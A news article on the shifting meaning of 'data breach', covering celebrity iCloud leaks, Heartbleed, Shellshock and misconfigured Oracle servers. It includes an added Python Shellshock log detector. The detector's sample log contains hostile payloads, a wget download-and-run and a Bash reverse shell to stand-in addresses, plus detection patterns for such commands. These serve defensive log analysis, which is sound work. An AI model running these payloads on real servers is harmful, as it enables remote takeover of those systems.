Why the meaning of ‘data breach’ is in flux


By Byron Acohido, ThirdCertainty

Data breaches. Vulnerabilities.

These terms have entered our lexicon. But what exactly do they refer to?

Recent news events show that we are in a period where the terminology we use to refer to security shortfalls is in flux.

Target, Home Depot and JPMorgan Chase clearly suffered major data breaches. So did Apple’s iCloud, Dropbox and Snapchat. Or so we thought.

Apple, Dropbox and Snapchat have denied being directly hacked, and strictly speaking each is right. Hackers may have sniffed Hollywood A-listers’ iCloud usernames and passwords over an open WiFi network at a celebrity event. And the Dropbox and Snapchat data apparently leaked from third-party apps that piggyback onto those services.

The distinction here is that the parent companies’ databases were not directly compromised. In the case of iCloud, the celebrity users may have exposed themselves by not paying closer attention to their digital footprints. And in the case of Dropbox and Snapchat, the breach occurred in the wild and woolly collection of third-party apps that tie into the big-name services.

Similarly, Heartbleed and Shellshock are two of the nastiest Internet-wide vulnerabilities ever to come to light. Heartbleed is a bug in OpenSSL, the cryptographic library behind the HTTPS connections of countless websites and shopping carts: a malformed heartbeat message lets a remote party read chunks of the server’s memory, which can include session cookies, passwords and private keys. Shellshock is a bug in Bash, the command shell on most Linux, Unix and Mac servers: anyone who can get text into an environment variable that Bash reads, such as a web request header handed to a CGI script, can run commands on the machine.


But what exactly was it that allowed ethical hacker Bryan Seely, of Seely Security, to access giant bond insurer MBIA’s customer financial accounts? Seely told ThirdCertainty he also has been able to tap into the Internet-facing Oracle servers of at least 8,000 other large organizations, including two Ivy League schools.

So was it one of these Internet-wide vulnerabilities that Seely manipulated? Not at all. Seely simply discovered that each organization had misconfigured its Oracle server software in a way that allowed the servers to be indexed, and thus made searchable, by Google and the Shodan search engine.

Confusing context

The implications of this are profound. It means anyone who takes the time to learn the finer points of conducting Google and Shodan searches can find and access misconfigured Oracle servers at thousands of clueless organizations.

“Our lexicon doesn’t have enough words to describe every flavor of information compromise, so we call every such incident a breach,” says Tal Klein, vice president of strategy at cloud security company Adallom. “This is a huge problem because it makes it very hard for the average person to understand exactly what their personal risk is in the context of each event.”

Our networks are getting ever more complex. Meanwhile, emerging threats are expanding and intensifying. In this mix, poor security practices remain the rule, not the exception. IBM Security Services’ 2014 Cyber Security Intelligence Index shows human error to be a contributing factor in 95 percent of security incidents. That includes misconfigurations, lax patch management and use of weak passwords.

Meanwhile, no one in the security community expects discoveries of serious flaws for which no patch yet exists when they are first found or exploited, the so-called zero-day vulnerabilities, to slow down any time soon.

“All software is buggy and vulnerable. Developers are under pressure to deliver more, faster, so they take shortcuts and make mistakes,” says Chris Goettl, principal manager at vulnerability management firm Shavlik. “The reality is that vulnerabilities like Heartbleed and Shellshock exist because software is only as secure as we can make it.”

Indeed, Heartbleed and Shellshock show how programming decisions made years, and in Bash’s case decades, ago, before social media and the Internet of Things, now translate into fresh turf for a willing and able cyber underground.

Shellshock attacks

Since the initial Shellshock vulnerability was reported Sept. 24, website security vendor Incapsula has blocked more than 310,000 attempts to exploit the Shellshock flaw on its clients’ websites, at one point as many as 1,860 attacks per hour.

Only 6 percent of that traffic appeared to be legitimate security scans. “An overwhelming 94 percent was some form of attack,” says Incapsula co-founder Marc Gaffan. “Specifically, these were scans by hackers, server hijack attempts, and DDoS malware seeding. The hijack attempts were the most immediately troubling, comprising about 20 percent of the total.”
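Whether a blocked request counts as a reconnaissance scan or a server-hijack attempt comes down to what the attacker put after the Bash function prefix in the request. The following Python is an added example, not Incapsula’s code or anything from the article: it runs a Shellshock detector over a handful of constructed web-server log lines and buckets the hits the way the figures above are bucketed. The log lines, the category names and the payload heuristics are this example’s own assumptions.

```python
import re
from collections import Counter

# Constructed sample of combined-format web server log lines (not real traffic).
# Shellshock payloads usually arrived in the User-Agent header, because CGI
# servers export request headers as environment variables (HTTP_USER_AGENT)
# that Bash then parsed.
SAMPLE_LOG = """\
203.0.113.5 - - [25/Sep/2014:10:01:12 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; echo; /bin/ping -c 1 198.51.100.7"
203.0.113.9 - - [25/Sep/2014:10:01:40 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :; }; /usr/bin/wget -O /tmp/x http://198.51.100.8/bot; chmod +x /tmp/x; /tmp/x"
198.51.100.23 - - [25/Sep/2014:10:02:03 +0000] "GET /index.html HTTP/1.1" 200 1024 "-" "Mozilla/5.0 (X11; Linux x86_64)"
203.0.113.77 - - [25/Sep/2014:10:02:15 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c 'bash -i >& /dev/tcp/198.51.100.9/4444 0>&1'"
203.0.113.5 - - [25/Sep/2014:10:03:01 +0000] "GET /cgi-bin/status HTTP/1.1" 200 512 "-" "() { ignored; }; /usr/bin/id"
"""

LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<agent>[^"]*)"$'
)

# The exported-function prefix that triggered Shellshock (CVE-2014-6271):
# vulnerable Bash kept parsing past the closing "};" of a function definition
# found in an environment variable and executed whatever followed it.
# Everything after the prefix is the attacker's command.
SHELLSHOCK_MARKER = re.compile(r"\(\)\s*\{[^}]*\}\s*;\s*(?P<payload>.*)")

# Payload heuristics. The categories are this example's own (assumption),
# chosen to mirror the split the article quotes: scans versus hijack attempts.
REVERSE_SHELL = re.compile(r"/dev/tcp/|\bnc\b.*\s-e\b|\bbash\s+-i\b")
DOWNLOAD_TOOLS = re.compile(r"\b(wget|curl|fetch|tftp)\b")
PROBE_CMDS = re.compile(r"\b(echo|id|uname|whoami|ping|sleep|cat)\b")


def classify_payload(payload):
    """Label a Shellshock payload by apparent intent."""
    if REVERSE_SHELL.search(payload) or DOWNLOAD_TOOLS.search(payload):
        return "hijack"   # pulls code onto the host or hands the attacker a shell
    if PROBE_CMDS.search(payload):
        return "probe"    # only checks whether the host is vulnerable
    return "unknown"


def detect_shellshock(line):
    """Return (source_ip, category, payload) if the line carries the marker, else None."""
    m = LOG_LINE.match(line)
    if m is None:
        return None
    rec = m.groupdict()
    # Any header a CGI server exports is a possible carrier; this log format
    # only records the request line, Referer and User-Agent, so check those.
    for field in ("agent", "referer", "request"):
        hit = SHELLSHOCK_MARKER.search(rec[field])
        if hit:
            payload = hit.group("payload").strip()
            return rec["ip"], classify_payload(payload), payload
    return None


def summarize(log_text):
    """Tally Shellshock attempts by category and by source address."""
    by_category = Counter()
    by_source = Counter()
    for line in log_text.splitlines():
        hit = detect_shellshock(line)
        if hit is not None:
            ip, category, _ = hit
            by_category[category] += 1
            by_source[ip] += 1
    return by_category, by_source


if __name__ == "__main__":
    categories, sources = summarize(SAMPLE_LOG)
    total = sum(categories.values())
    for category, n in categories.most_common():
        print(f"{category:8s} {n:3d}  ({100 * n / total:.0f}% of attempts)")
    print("sources:", dict(sources))
```

The split this reports is by payload intent only. Separating a legitimate vendor scan from an attacker’s scan, as the 6 percent figure above does, needs source attribution (known scanner ranges, customer authorization) that a log line alone cannot supply. And because patched Bash ignores the payload, the detector tells you who tried, not who succeeded; that question is answered by the server’s own process and outbound-connection logs.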

Probes to take advantage of Heartbleed and Shellshock have the earmarks of being backed by organized crime. There is another tier of much less sophisticated thieves and pranksters having a grand time probing weaknesses arising from the mishmash of partnerships and sharing attendant to social media services such as iCloud, Dropbox and Snapchat.

Adallom’s Klein argues that company owners, and consumers, celebrities included, need to share the burden of preserving security.

Use common sense. Guard your sensitive data and photos. Don’t give sweeping permissions to trivial apps. Don’t use the same username and password on multiple accounts.

And if you run a business, ingrain security into your business plan. Advises Klein: “Start being strategic about vulnerability mitigation; perform an audit of open source technologies your infrastructure is built on; have good patching hygiene as a de facto standard; assign engineering resources to participate in the development and maintenance of these projects.”
